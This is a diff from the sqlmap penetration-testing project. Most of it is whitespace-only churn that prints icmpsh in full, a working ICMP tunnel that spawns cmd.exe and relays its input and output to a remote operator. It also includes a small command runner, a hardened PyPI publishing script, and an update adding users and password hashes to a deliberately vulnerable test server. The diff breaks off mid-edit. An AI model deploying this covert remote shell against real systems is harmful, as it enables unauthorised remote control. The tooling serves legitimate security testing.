+                icmp->checksum = checksum((unsigned short *) icmp, sizeof(struct icmphdr) + out_size);
-
+
-                // send reply
+                // send reply
-                nbytes = sendto(sockfd, icmp, sizeof(struct icmphdr) + out_size, 0, (struct sockaddr *) &addr, sizeof(addr));
+                nbytes = sendto(sockfd, icmp, sizeof(struct icmphdr) + out_size, 0, (struct sockaddr *) &addr, sizeof(addr));
-                if (nbytes == -1) {
+                if (nbytes == -1) {
-                    perror("sendto");
+                    perror("sendto");
-                    return -1;
+                    return -1;
-                }        
+                }        
-            }
+            }
-        }
+        }
-    }
+    }
-
+
-    return 0;
+    return 0;
-}
+}
-
+

extra/icmpsh/icmpsh-s.c

@@ -1,344 +1,344 @@
-/*
+/*
- *   icmpsh - simple icmp command shell
+ *   icmpsh - simple icmp command shell
- *   Copyright (c) 2010, Nico Leidecker <nico@leidecker.info>
+ *   Copyright (c) 2010, Nico Leidecker <nico@leidecker.info>
- *   This program is free software: you can redistribute it and/or modify
+ *   This program is free software: you can redistribute it and/or modify
- *   it under the terms of the GNU General Public License as published by
+ *   it under the terms of the GNU General Public License as published by
- *   the Free Software Foundation, either version 3 of the License, or
+ *   the Free Software Foundation, either version 3 of the License, or
- *   (at your option) any later version.
+ *   (at your option) any later version.
- *
+ *
- *    This program is distributed in the hope that it will be useful,
+ *    This program is distributed in the hope that it will be useful,
- *    but WITHOUT ANY WARRANTY; without even the implied warranty of
+ *    but WITHOUT ANY WARRANTY; without even the implied warranty of
- *    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ *    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
- *    GNU General Public License for more details.
+ *    GNU General Public License for more details.
- *
+ *
- *    You should have received a copy of the GNU General Public License
+ *    You should have received a copy of the GNU General Public License
- *    along with this program.  If not, see <http://www.gnu.org/licenses/>.
+ *    along with this program.  If not, see <http://www.gnu.org/licenses/>.
- */
+ */
-
+
-
+
-#include <stdio.h>
+#include <stdio.h>
-#include <stdlib.h>
+#include <stdlib.h>
-#include <winsock2.h>
+#include <winsock2.h>
-#include <windows.h>
+#include <windows.h>
-#include <winsock2.h>
+#include <winsock2.h>
-#include <iphlpapi.h>
+#include <iphlpapi.h>
-
+
-#define ICMP_HEADERS_SIZE	(sizeof(ICMP_ECHO_REPLY) + 8)
+#define ICMP_HEADERS_SIZE	(sizeof(ICMP_ECHO_REPLY) + 8)
-
+
-#define STATUS_OK					0
+#define STATUS_OK					0
-#define STATUS_SINGLE				1
+#define STATUS_SINGLE				1
-#define STATUS_PROCESS_NOT_CREATED	2
+#define STATUS_PROCESS_NOT_CREATED	2
-
+
-#define TRANSFER_SUCCESS			1
+#define TRANSFER_SUCCESS			1
-#define TRANSFER_FAILURE			0
+#define TRANSFER_FAILURE			0
-
+
-#define DEFAULT_TIMEOUT			    3000
+#define DEFAULT_TIMEOUT			    3000
-#define DEFAULT_DELAY			    200
+#define DEFAULT_DELAY			    200
-#define DEFAULT_MAX_BLANKS	   	    10
+#define DEFAULT_MAX_BLANKS	   	    10
-#define DEFAULT_MAX_DATA_SIZE	    64
+#define DEFAULT_MAX_DATA_SIZE	    64
-
+
-FARPROC icmp_create, icmp_send, to_ip;
+FARPROC icmp_create, icmp_send, to_ip;
-
+
-int verbose = 0;
+int verbose = 0;
-
+
-int spawn_shell(PROCESS_INFORMATION *pi, HANDLE *out_read, HANDLE *in_write)
+int spawn_shell(PROCESS_INFORMATION *pi, HANDLE *out_read, HANDLE *in_write)
-{
+{
-	SECURITY_ATTRIBUTES sattr;
+	SECURITY_ATTRIBUTES sattr;
-	STARTUPINFOA si;
+	STARTUPINFOA si;
-	HANDLE in_read, out_write;
+	HANDLE in_read, out_write;
-
+
-	memset(&si, 0x00, sizeof(SECURITY_ATTRIBUTES));
+	memset(&si, 0x00, sizeof(SECURITY_ATTRIBUTES));
-	memset(pi, 0x00, sizeof(PROCESS_INFORMATION));
+	memset(pi, 0x00, sizeof(PROCESS_INFORMATION));
-    
+    
-	// create communication pipes  
+	// create communication pipes  
-	memset(&sattr, 0x00, sizeof(SECURITY_ATTRIBUTES));
+	memset(&sattr, 0x00, sizeof(SECURITY_ATTRIBUTES));
-	sattr.nLength = sizeof(SECURITY_ATTRIBUTES); 
+	sattr.nLength = sizeof(SECURITY_ATTRIBUTES); 
-	sattr.bInheritHandle = TRUE; 
+	sattr.bInheritHandle = TRUE; 
-	sattr.lpSecurityDescriptor = NULL; 
+	sattr.lpSecurityDescriptor = NULL; 
-
+
-	if (!CreatePipe(out_read, &out_write, &sattr, 0)) {
+	if (!CreatePipe(out_read, &out_write, &sattr, 0)) {
-		return STATUS_PROCESS_NOT_CREATED;
+		return STATUS_PROCESS_NOT_CREATED;
-	}
+	}
-	if (!SetHandleInformation(*out_read, HANDLE_FLAG_INHERIT, 0)) {
+	if (!SetHandleInformation(*out_read, HANDLE_FLAG_INHERIT, 0)) {
-		return STATUS_PROCESS_NOT_CREATED;
+		return STATUS_PROCESS_NOT_CREATED;
-	}
+	}
-
+
-	if (!CreatePipe(&in_read, in_write, &sattr, 0)) {
+	if (!CreatePipe(&in_read, in_write, &sattr, 0)) {
-		return STATUS_PROCESS_NOT_CREATED;
+		return STATUS_PROCESS_NOT_CREATED;
-	}
+	}
-	if (!SetHandleInformation(*in_write, HANDLE_FLAG_INHERIT, 0)) {
+	if (!SetHandleInformation(*in_write, HANDLE_FLAG_INHERIT, 0)) {
-		return STATUS_PROCESS_NOT_CREATED;
+		return STATUS_PROCESS_NOT_CREATED;
-	}
+	}
-
+
-	// spawn process
+	// spawn process
-	memset(&si, 0x00, sizeof(STARTUPINFO));
+	memset(&si, 0x00, sizeof(STARTUPINFO));
-	si.cb = sizeof(STARTUPINFO); 
+	si.cb = sizeof(STARTUPINFO); 
-	si.hStdError = out_write;
+	si.hStdError = out_write;
-	si.hStdOutput = out_write;
+	si.hStdOutput = out_write;
-	si.hStdInput = in_read;
+	si.hStdInput = in_read;
-	si.dwFlags |= STARTF_USESTDHANDLES;
+	si.dwFlags |= STARTF_USESTDHANDLES;
-
+
-	if (!CreateProcessA(NULL, "cmd", NULL, NULL, TRUE, 0, NULL, NULL, (LPSTARTUPINFOA) &si, pi)) {
+	if (!CreateProcessA(NULL, "cmd", NULL, NULL, TRUE, 0, NULL, NULL, (LPSTARTUPINFOA) &si, pi)) {
-		return STATUS_PROCESS_NOT_CREATED;
+		return STATUS_PROCESS_NOT_CREATED;
-	}
+	}
-
+
-	CloseHandle(out_write);
+	CloseHandle(out_write);
-	CloseHandle(in_read);
+	CloseHandle(in_read);
-
+
-	return STATUS_OK;
+	return STATUS_OK;
-}
+}
-
+
-void usage(char *path)
+void usage(char *path)
-{
+{
-	printf("%s [options] -t target\n", path);
+	printf("%s [options] -t target\n", path);
-	printf("options:\n");
+	printf("options:\n");
-	printf("  -t host            host ip address to send ping requests to\n");
+	printf("  -t host            host ip address to send ping requests to\n");
-	printf("  -r                 send a single test icmp request and then quit\n");
+	printf("  -r                 send a single test icmp request and then quit\n");
-	printf("  -d milliseconds    delay between requests in milliseconds (default is %u)\n", DEFAULT_DELAY);
+	printf("  -d milliseconds    delay between requests in milliseconds (default is %u)\n", DEFAULT_DELAY);
-	printf("  -o milliseconds    timeout in milliseconds\n");
+	printf("  -o milliseconds    timeout in milliseconds\n");
-	printf("  -h                 this screen\n");
+	printf("  -h                 this screen\n");
-	printf("  -b num             maximal number of blanks (unanswered icmp requests)\n");
+	printf("  -b num             maximal number of blanks (unanswered icmp requests)\n");
-    printf("                     before quitting\n");
+    printf("                     before quitting\n");
-	printf("  -s bytes           maximal data buffer size in bytes (default is %u bytes)\n\n", DEFAULT_MAX_DATA_SIZE);
+	printf("  -s bytes           maximal data buffer size in bytes (default is %u bytes)\n\n", DEFAULT_MAX_DATA_SIZE);
-	printf("In order to improve the speed, lower the delay (-d) between requests or\n");
+	printf("In order to improve the speed, lower the delay (-d) between requests or\n");
-    printf("increase the size (-s) of the data buffer\n");
+    printf("increase the size (-s) of the data buffer\n");
-}
+}
-
+
-void create_icmp_channel(HANDLE *icmp_chan)
+void create_icmp_channel(HANDLE *icmp_chan)
-{
+{
-	// create icmp file
+	// create icmp file
-	*icmp_chan = (HANDLE) icmp_create();
+	*icmp_chan = (HANDLE) icmp_create();
-}
+}
-
+
-int transfer_icmp(HANDLE icmp_chan, unsigned int target, char *out_buf, unsigned int out_buf_size, char *in_buf, unsigned int *in_buf_size, unsigned int max_in_data_size, unsigned int timeout)
+int transfer_icmp(HANDLE icmp_chan, unsigned int target, char *out_buf, unsigned int out_buf_size, char *in_buf, unsigned int *in_buf_size, unsigned int max_in_data_size, unsigned int timeout)
-{
+{
-	int rs;
+	int rs;
-	char *temp_in_buf;
+	char *temp_in_buf;
-	int nbytes;
+	int nbytes;
-
+
-	PICMP_ECHO_REPLY echo_reply;
+	PICMP_ECHO_REPLY echo_reply;
-
+
-	temp_in_buf = (char *) malloc(max_in_data_size + ICMP_HEADERS_SIZE);
+	temp_in_buf = (char *) malloc(max_in_data_size + ICMP_HEADERS_SIZE);
-	if (!temp_in_buf) {
+	if (!temp_in_buf) {
-		return TRANSFER_FAILURE;
+		return TRANSFER_FAILURE;
-	}
+	}
-
+
-	// send data to remote host
+	// send data to remote host
-	rs = icmp_send(
+	rs = icmp_send(
-			icmp_chan,
+			icmp_chan,
-			target,
+			target,
-			out_buf,
+			out_buf,
-			out_buf_size,
+			out_buf_size,
-			NULL,
+			NULL,
-			temp_in_buf,
+			temp_in_buf,
-			max_in_data_size + ICMP_HEADERS_SIZE,
+			max_in_data_size + ICMP_HEADERS_SIZE,
-			timeout);
+			timeout);
-
+
-		// check received data
+		// check received data
-		if (rs > 0) {
+		if (rs > 0) {
-			echo_reply = (PICMP_ECHO_REPLY) temp_in_buf;
+			echo_reply = (PICMP_ECHO_REPLY) temp_in_buf;
-			if (echo_reply->DataSize > max_in_data_size) {
+			if (echo_reply->DataSize > max_in_data_size) {
-				nbytes = max_in_data_size;
+				nbytes = max_in_data_size;
-			} else {
+			} else {
-				nbytes = echo_reply->DataSize;
+				nbytes = echo_reply->DataSize;
-			}
+			}
-			memcpy(in_buf, echo_reply->Data, nbytes);
+			memcpy(in_buf, echo_reply->Data, nbytes);
-			*in_buf_size = nbytes;
+			*in_buf_size = nbytes;
-
+
-			free(temp_in_buf);
+			free(temp_in_buf);
-			return TRANSFER_SUCCESS;
+			return TRANSFER_SUCCESS;
-		}
+		}
-
+
-		free(temp_in_buf);
+		free(temp_in_buf);
-
+
-    return TRANSFER_FAILURE;
+    return TRANSFER_FAILURE;
-}
+}
-
+
-int load_deps()
+int load_deps()
-{
+{
-	HMODULE lib;
+	HMODULE lib;
-	
+	
-	lib = LoadLibraryA("ws2_32.dll");
+	lib = LoadLibraryA("ws2_32.dll");
-	if (lib != NULL) {
+	if (lib != NULL) {
-        to_ip = GetProcAddress(lib, "inet_addr");
+        to_ip = GetProcAddress(lib, "inet_addr");
-        if (!to_ip) {   
+        if (!to_ip) {   
-            return 0;
+            return 0;
-        }
+        }
-    }
+    }
-
+
-	lib = LoadLibraryA("iphlpapi.dll");
+	lib = LoadLibraryA("iphlpapi.dll");
-	if (lib != NULL) {
+	if (lib != NULL) {
-		icmp_create = GetProcAddress(lib, "IcmpCreateFile");
+		icmp_create = GetProcAddress(lib, "IcmpCreateFile");
-		icmp_send = GetProcAddress(lib, "IcmpSendEcho");
+		icmp_send = GetProcAddress(lib, "IcmpSendEcho");
-		if (icmp_create && icmp_send) {
+		if (icmp_create && icmp_send) {
-			return 1;
+			return 1;
-		}
+		}
-	} 
+	} 
-
+
-	lib = LoadLibraryA("ICMP.DLL");
+	lib = LoadLibraryA("ICMP.DLL");
-	if (lib != NULL) {
+	if (lib != NULL) {
-		icmp_create = GetProcAddress(lib, "IcmpCreateFile");
+		icmp_create = GetProcAddress(lib, "IcmpCreateFile");
-		icmp_send = GetProcAddress(lib, "IcmpSendEcho");
+		icmp_send = GetProcAddress(lib, "IcmpSendEcho");
-		if (icmp_create && icmp_send) {
+		if (icmp_create && icmp_send) {
-			return 1;
+			return 1;
-		}
+		}
-	}
+	}
-	
+	
-	printf("failed to load functions (%u)", GetLastError());
+	printf("failed to load functions (%u)", GetLastError());
-
+
-	return 0;
+	return 0;
-}
+}
-int main(int argc, char **argv)
+int main(int argc, char **argv)
-{
+{
-	int opt;
+	int opt;
-	char *target;
+	char *target;
-	unsigned int delay, timeout;
+	unsigned int delay, timeout;
-	unsigned int ip_addr;
+	unsigned int ip_addr;
-	HANDLE pipe_read, pipe_write;
+	HANDLE pipe_read, pipe_write;
-	HANDLE icmp_chan;
+	HANDLE icmp_chan;
-	unsigned char *in_buf, *out_buf;
+	unsigned char *in_buf, *out_buf;
-	unsigned int in_buf_size, out_buf_size;
+	unsigned int in_buf_size, out_buf_size;
-	DWORD rs;
+	DWORD rs;
-	int blanks, max_blanks;
+	int blanks, max_blanks;
-	PROCESS_INFORMATION pi;
+	PROCESS_INFORMATION pi;
-	int status;
+	int status;
-	unsigned int max_data_size;
+	unsigned int max_data_size;
-
+
-	// set defaults
+	// set defaults
-	target = 0;
+	target = 0;
-	timeout = DEFAULT_TIMEOUT;
+	timeout = DEFAULT_TIMEOUT;
-	delay = DEFAULT_DELAY;
+	delay = DEFAULT_DELAY;
-	max_blanks = DEFAULT_MAX_BLANKS;
+	max_blanks = DEFAULT_MAX_BLANKS;
-	max_data_size = DEFAULT_MAX_DATA_SIZE;
+	max_data_size = DEFAULT_MAX_DATA_SIZE;
-
+
-	status = STATUS_OK;
+	status = STATUS_OK;
-	if (!load_deps()) {
+	if (!load_deps()) {
-		printf("failed to load ICMP library\n");
+		printf("failed to load ICMP library\n");
-		return -1;
+		return -1;
-	}
+	}
-
+
-	// parse command line options
+	// parse command line options
-	for (opt = 1; opt < argc; opt++) {
+	for (opt = 1; opt < argc; opt++) {
-		if (argv[opt][0] == '-') {
+		if (argv[opt][0] == '-') {
-			switch(argv[opt][1]) {
+			switch(argv[opt][1]) {
-				case 'h':
+				case 'h':
-				    usage(*argv);
+				    usage(*argv);
-					return 0;
+					return 0;
-				case 't':
+				case 't':
-					if (opt + 1 < argc) {
+					if (opt + 1 < argc) {
-						target = argv[opt + 1];
+						target = argv[opt + 1];
-					}
+					}
-					break;
+					break;
-				case 'd':
+				case 'd':
-					if (opt + 1 < argc) {
+					if (opt + 1 < argc) {
-						delay = atol(argv[opt + 1]);
+						delay = atol(argv[opt + 1]);
-					}
+					}
-					break;
+					break;
-				case 'o':
+				case 'o':
-					if (opt + 1 < argc) {
+					if (opt + 1 < argc) {
-						timeout = atol(argv[opt + 1]);
+						timeout = atol(argv[opt + 1]);
-					}
+					}
-					break;
+					break;
-				case 'r':
+				case 'r':
-					status = STATUS_SINGLE;
+					status = STATUS_SINGLE;
-					break;
+					break;
-				case 'b':
+				case 'b':
-					if (opt + 1 < argc) {
+					if (opt + 1 < argc) {
-						max_blanks = atol(argv[opt + 1]);
+						max_blanks = atol(argv[opt + 1]);
-					}
+					}
-					break;
+					break;
-				case 's':
+				case 's':
-					if (opt + 1 < argc) {
+					if (opt + 1 < argc) {
-						max_data_size = atol(argv[opt + 1]);
+						max_data_size = atol(argv[opt + 1]);
-					}
+					}
-					break;
+					break;
-				default:
+				default:
-					printf("unrecognized option -%c\n", argv[1][0]);
+					printf("unrecognized option -%c\n", argv[1][0]);
-					usage(*argv);
+					usage(*argv);
-					return -1;
+					return -1;
-			}
+			}
-		}
+		}
-	}
+	}
-
+
-	if (!target) {
+	if (!target) {
-		printf("you need to specify a host with -t. Try -h for more options\n");
+		printf("you need to specify a host with -t. Try -h for more options\n");
-		return -1;
+		return -1;
-	}
+	}
-	ip_addr = to_ip(target);
+	ip_addr = to_ip(target);
-
+
-	// don't spawn a shell if we're only sending a single test request
+	// don't spawn a shell if we're only sending a single test request
-	if (status != STATUS_SINGLE) {
+	if (status != STATUS_SINGLE) {
-		status = spawn_shell(&pi, &pipe_read, &pipe_write);
+		status = spawn_shell(&pi, &pipe_read, &pipe_write);
-	}
+	}
-
+
-	// create icmp channel
+	// create icmp channel
-	create_icmp_channel(&icmp_chan);
+	create_icmp_channel(&icmp_chan);
-	if (icmp_chan == INVALID_HANDLE_VALUE) {
+	if (icmp_chan == INVALID_HANDLE_VALUE) {
-	    printf("unable to create ICMP file: %u\n", GetLastError());
+	    printf("unable to create ICMP file: %u\n", GetLastError());
-	    return -1;
+	    return -1;
-	}
+	}
-
+
-	// allocate transfer buffers
+	// allocate transfer buffers
-	in_buf = (char *) malloc(max_data_size + ICMP_HEADERS_SIZE);
+	in_buf = (char *) malloc(max_data_size + ICMP_HEADERS_SIZE);
-	out_buf = (char *) malloc(max_data_size + ICMP_HEADERS_SIZE);
+	out_buf = (char *) malloc(max_data_size + ICMP_HEADERS_SIZE);
-	if (!in_buf || !out_buf) {
+	if (!in_buf || !out_buf) {
-		printf("failed to allocate memory for transfer buffers\n");
+		printf("failed to allocate memory for transfer buffers\n");
-		return -1;
+		return -1;
-	}
+	}
-	memset(in_buf, 0x00, max_data_size + ICMP_HEADERS_SIZE);
+	memset(in_buf, 0x00, max_data_size + ICMP_HEADERS_SIZE);
-	memset(out_buf, 0x00, max_data_size + ICMP_HEADERS_SIZE);
+	memset(out_buf, 0x00, max_data_size + ICMP_HEADERS_SIZE);
-
+
-	// sending/receiving loop
+	// sending/receiving loop
-	blanks = 0;
+	blanks = 0;
-	do {
+	do {
-
+
-		switch(status) {
+		switch(status) {
-			case STATUS_SINGLE:
+			case STATUS_SINGLE:
-				// reply with a static string
+				// reply with a static string
-				out_buf_size = sprintf(out_buf, "Test1234\n");
+				out_buf_size = sprintf(out_buf, "Test1234\n");
-				break;
+				break;
-			case STATUS_PROCESS_NOT_CREATED:
+			case STATUS_PROCESS_NOT_CREATED:
-				// reply with error message
+				// reply with error message
-				out_buf_size = sprintf(out_buf, "Process was not created\n");
+				out_buf_size = sprintf(out_buf, "Process was not created\n");
-				break;
+				break;
-			default:
+			default:
-				// read data from process via pipe
+				// read data from process via pipe
-				out_buf_size = 0;
+				out_buf_size = 0;
-				if (PeekNamedPipe(pipe_read, NULL, 0, NULL, &out_buf_size, NULL)) {
+				if (PeekNamedPipe(pipe_read, NULL, 0, NULL, &out_buf_size, NULL)) {
-					if (out_buf_size > 0) {
+					if (out_buf_size > 0) {
-						out_buf_size = 0;
+						out_buf_size = 0;
-						rs = ReadFile(pipe_read, out_buf, max_data_size, &out_buf_size, NULL);
+						rs = ReadFile(pipe_read, out_buf, max_data_size, &out_buf_size, NULL);
-						if (!rs && GetLastError() != ERROR_IO_PENDING) {
+						if (!rs && GetLastError() != ERROR_IO_PENDING) {
-							out_buf_size = sprintf(out_buf, "Error: ReadFile failed with %i\n", GetLastError());
+							out_buf_size = sprintf(out_buf, "Error: ReadFile failed with %i\n", GetLastError());
-						} 
+						} 
-					}
+					}
-				} else {
+				} else {
-					out_buf_size = sprintf(out_buf, "Error: PeekNamedPipe failed with %i\n", GetLastError());
+					out_buf_size = sprintf(out_buf, "Error: PeekNamedPipe failed with %i\n", GetLastError());
-				}
+				}
-				break;
+				break;
-		}
+		}
-
+
-		// send request/receive response
+		// send request/receive response
-		if (transfer_icmp(icmp_chan, ip_addr, out_buf, out_buf_size, in_buf, &in_buf_size,  max_data_size, timeout) == TRANSFER_SUCCESS) {
+		if (transfer_icmp(icmp_chan, ip_addr, out_buf, out_buf_size, in_buf, &in_buf_size,  max_data_size, timeout) == TRANSFER_SUCCESS) {
-			if (status == STATUS_OK) {
+			if (status == STATUS_OK) {
-				// write data from response back into pipe
+				// write data from response back into pipe
-				WriteFile(pipe_write, in_buf, in_buf_size, &rs, 0);
+				WriteFile(pipe_write, in_buf, in_buf_size, &rs, 0);
-			}
+			}
-			blanks = 0;
+			blanks = 0;
-		} else {
+		} else {
-			// no reply received or error occured
+			// no reply received or error occured
-			blanks++;
+			blanks++;
-		}
+		}
-
+
-		// wait between requests
+		// wait between requests
-		Sleep(delay);
+		Sleep(delay);
-
+
-	} while (status == STATUS_OK && blanks < max_blanks);
+	} while (status == STATUS_OK && blanks < max_blanks);
-
+
-	if (status == STATUS_OK) {
+	if (status == STATUS_OK) {
-		TerminateProcess(pi.hProcess, 0);
+		TerminateProcess(pi.hProcess, 0);
-	}
+	}
-
+
-    return 0;
+    return 0;
-}
+}
-
+

extra/runcmd/src/runcmd/runcmd.cpp

@@ -1,46 +1,46 @@
-/* 
+/* 
-	runcmd - a program for running command prompt commands
+	runcmd - a program for running command prompt commands
-	Copyright (C) 2010 Miroslav Stampar
+	Copyright (C) 2010 Miroslav Stampar
-	email: miroslav.stampar@gmail.com
+	email: miroslav.stampar@gmail.com
-	
+	
-	This library is free software; you can redistribute it and/or
+	This library is free software; you can redistribute it and/or
-	modify it under the terms of the GNU Lesser General Public
+	modify it under the terms of the GNU Lesser General Public
-	License as published by the Free Software Foundation; either
+	License as published by the Free Software Foundation; either
-	version 2.1 of the License, or (at your option) any later version.
+	version 2.1 of the License, or (at your option) any later version.
-	
+	
-	This library is distributed in the hope that it will be useful,
+	This library is distributed in the hope that it will be useful,
-	but WITHOUT ANY WARRANTY; without even the implied warranty of
+	but WITHOUT ANY WARRANTY; without even the implied warranty of
-	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-	Lesser General Public License for more details.
+	Lesser General Public License for more details.
-	
+	
-	You should have received a copy of the GNU Lesser General Public
+	You should have received a copy of the GNU Lesser General Public
-	License along with this library; if not, write to the Free Software
+	License along with this library; if not, write to the Free Software
-	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
+	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-*/
+*/
-
+
-#include <stdio.h>
+#include <stdio.h>
-#include <windows.h>
+#include <windows.h>
-#include <use_ansi.h>
+#include <use_ansi.h>
-#include "stdafx.h"
+#include "stdafx.h"
-#include <string>
+#include <string>
-
+
-using namespace std;
+using namespace std;
-int main(int argc, char* argv[])
+int main(int argc, char* argv[])
-{
+{
-  FILE *fp;
+  FILE *fp;
-  string cmd;
+  string cmd;
-
+
-  for( int count = 1; count < argc; count++ )
+  for( int count = 1; count < argc; count++ )
-	cmd += " " + string(argv[count]);
+	cmd += " " + string(argv[count]);
-
+
-  fp = _popen(cmd.c_str(), "r");
+  fp = _popen(cmd.c_str(), "r");
-
+
-  if (fp != NULL) {
+  if (fp != NULL) {
-    char buffer[BUFSIZ];
+    char buffer[BUFSIZ];
-
+
-    while (fgets(buffer, sizeof buffer, fp) != NULL)
+    while (fgets(buffer, sizeof buffer, fp) != NULL)
-      fputs(buffer, stdout);
+      fputs(buffer, stdout);
-  }
+  }
-
+
-  return 0;
+  return 0;
-}
+}

extra/runcmd/src/runcmd/stdafx.cpp

@@ -1,8 +1,8 @@
-// stdafx.cpp : source file that includes just the standard includes
+// stdafx.cpp : source file that includes just the standard includes
-// runcmd.pch will be the pre-compiled header
+// runcmd.pch will be the pre-compiled header
-// stdafx.obj will contain the pre-compiled type information
+// stdafx.obj will contain the pre-compiled type information
-
+
-#include "stdafx.h"
+#include "stdafx.h"
-
+
-// TODO: reference any additional headers you need in STDAFX.H
+// TODO: reference any additional headers you need in STDAFX.H
-// and not in this file
+// and not in this file

extra/runcmd/src/runcmd/stdafx.h

@@ -1,17 +1,17 @@
-// stdafx.h : include file for standard system include files,
+// stdafx.h : include file for standard system include files,
-// or project specific include files that are used frequently, but
+// or project specific include files that are used frequently, but
-// are changed infrequently
+// are changed infrequently
-//
+//
-
+
-#pragma once
+#pragma once
-
+
-#ifndef _WIN32_WINNT		// Allow use of features specific to Windows XP or later.                   
+#ifndef _WIN32_WINNT		// Allow use of features specific to Windows XP or later.                   
-#define _WIN32_WINNT 0x0501	// Change this to the appropriate value to target other versions of Windows.
+#define _WIN32_WINNT 0x0501	// Change this to the appropriate value to target other versions of Windows.
-#endif						
+#endif						
-
+
-#include <stdio.h>
+#include <stdio.h>
-#include <tchar.h>
+#include <tchar.h>
-
+
-
+
-
+
-// TODO: reference additional headers your program requires here
+// TODO: reference additional headers your program requires here

extra/shutils/pypi.sh

@@ -1,4 +1,6 @@
 #!/bin/bash
+set -euo pipefail
+IFS=$'\n\t'
 
 if [ ! -f ~/.pypirc ]; then
     echo "File ~/.pypirc is missing"
@@ -9,10 +11,11 @@ declare -x SCRIPTPATH="${0}"
 SETTINGS="${SCRIPTPATH%/*}/../../lib/core/settings.py"
 VERSION=$(cat $SETTINGS | grep -E "^VERSION =" | cut -d '"' -f 2 | cut -d '.' -f 1-3)
 TYPE=pip
-TMP_DIR=/tmp/pypi
+TMP_DIR="$(mktemp -d -t pypi.XXXXXXXX)"
-mkdir $TMP_DIR
+cleanup() { rm -rf -- "${TMP_DIR:?}"; }
-cd $TMP_DIR
+trap cleanup EXIT
-cat > $TMP_DIR/setup.py << EOF
+cd "$TMP_DIR"
+cat > "$TMP_DIR/setup.py" << EOF
 #!/usr/bin/env python
 
 """
@@ -176,8 +179,14 @@ Links
 EOF
 sed -i "s/^VERSION =.*/VERSION = \"$VERSION\"/g" sqlmap/lib/core/settings.py
 sed -i "s/^TYPE =.*/TYPE = \"$TYPE\"/g" sqlmap/lib/core/settings.py
-for file in $(find sqlmap -type f | grep -v -E "\.(git|yml)"); do echo include $file >> MANIFEST.in; done
+: > MANIFEST.in
+while IFS= read -r -d '' file; do
+    case "$file" in
+        *.git|*.yml) continue ;;
+    esac
+    echo "include $file" >> MANIFEST.in
+done < <(find sqlmap -type f -print0)
 python setup.py sdist bdist_wheel
 twine check dist/*
 twine upload --config-file=~/.pypirc dist/*
-rm -rf $TMP_DIR
+rm -rf "$TMP_DIR"

extra/vulnserver/vulnserver.py

@@ -11,8 +11,10 @@ from __future__ import print_function
 
 import base64
 import json
+import random
 import re
 import sqlite3
+import string
 import sys
 import threading
 import traceback
@@ -49,9 +51,70 @@ SCHEMA = """
     );
     INSERT INTO users (id, name, surname) VALUES (1, 'luther', 'blisset');
     INSERT INTO users (id, name, surname) VALUES (2, 'fluffy', 'bunny');
-    INSERT INTO users (id, name, surname) VALUES (3, 'wu', '179ad45c6ce2cb97cf1029e212046e81');
+    INSERT INTO users (id, name, surname) VALUES (3, 'wu', 'ming');
-    INSERT INTO users (id, name, surname) VALUES (4, 'sqlmap/1.0-dev (https://sqlmap.org)', 'user agent header');
+    INSERT INTO users (id, name, surname) VALUES (4, NULL, 'nameisnull');
-    INSERT INTO users (id, name, surname) VALUES (5, NULL, 'nameisnull');
+    INSERT INTO users (id, name, surname) VALUES (5, 'mark', 'lewis');
+    INSERT INTO users (id, name, surname) VALUES (6, 'ada', 'lovelace');
+    INSERT INTO users (id, name, surname) VALUES (7, 'grace', 'hopper');
+    INSERT INTO users (id, name, surname) VALUES (8, 'alan', 'turing');
+    INSERT INTO users (id, name, surname) VALUES (9, 'margaret','hamilton');
+    INSERT INTO users (id, name, surname) VALUES (10, 'donald', 'knuth');
+    INSERT INTO users (id, name, surname) VALUES (11, 'tim', 'bernerslee');
+    INSERT INTO users (id, name, surname) VALUES (12, 'linus', 'torvalds');
+    INSERT INTO users (id, name, surname) VALUES (13, 'ken', 'thompson');
+    INSERT INTO users (id, name, surname) VALUES (14, 'dennis', 'ritchie');
+    INSERT INTO users (id, name, surname) VALUES (15, 'barbara', 'liskov');
+    INSERT INTO users (id, name, surname) VALUES (16, 'edsger', 'dijkstra');
+    INSERT INTO users (id, name, surname) VALUES (17, 'john', 'mccarthy');
+    INSERT INTO users (id, name, surname) VALUES (18, 'leslie', 'lamport');
+    INSERT INTO users (id, name, surname) VALUES (19, 'niklaus', 'wirth');
+    INSERT INTO users (id, name, surname) VALUES (20, 'bjarne', 'stroustrup');
+    INSERT INTO users (id, name, surname) VALUES (21, 'guido', 'vanrossum');
+    INSERT INTO users (id, name, surname) VALUES (22, 'brendan', 'eich');
+    INSERT INTO users (id, name, surname) VALUES (23, 'james', 'gosling');
+    INSERT INTO users (id, name, surname) VALUES (24, 'andrew', 'tanenbaum');
+    INSERT INTO users (id, name, surname) VALUES (25, 'yukihiro','matsumoto');
+    INSERT INTO users (id, name, surname) VALUES (26, 'radia', 'perlman');
+    INSERT INTO users (id, name, surname) VALUES (27, 'katherine','johnson');
+    INSERT INTO users (id, name, surname) VALUES (28, 'hady', 'lamarr');
+    INSERT INTO users (id, name, surname) VALUES (29, 'frank', 'miller');
+    INSERT INTO users (id, name, surname) VALUES (30, 'john', 'steward');
+
+    CREATE TABLE creds (
+        user_id INTEGER,
+        password_hash TEXT,
+        FOREIGN KEY (user_id) REFERENCES users(id)
+    );
+    INSERT INTO creds (user_id, password_hash) VALUES (1, 'db3a16990a0008a3b04707fdef6584a0');
+    INSERT INTO creds (user_id, password_hash) VALUES (2, '4db967ce67b15e7fb84c266a76684729');
+    INSERT INTO creds (user_id, password_hash) VALUES (3, 'f5a2950eaa10f9e99896800eacbe8275');
+    INSERT INTO creds (user_id, password_hash) VALUES (4, NULL);
+    INSERT INTO creds (user_id, password_hash) VALUES (5, '179ad45c6ce2cb97cf1029e212046e81');
+    INSERT INTO creds (user_id, password_hash) VALUES (6, '0f1e2d3c4b5a69788796a5b4c3d2e1f0');
+    INSERT INTO creds (user_id, password_hash) VALUES (7, 'a1b2c3d4e5f60718293a4b5c6d7e8f90');
+    INSERT INTO creds (user_id, password_hash) VALUES (8, '1a2b3c4d5e6f708192a3b4c5d6e7f809');
+    INSERT INTO creds (user_id, password_hash) VALUES (9, '9f8e7d6c5b4a3928170605f4e3d2c1b0');
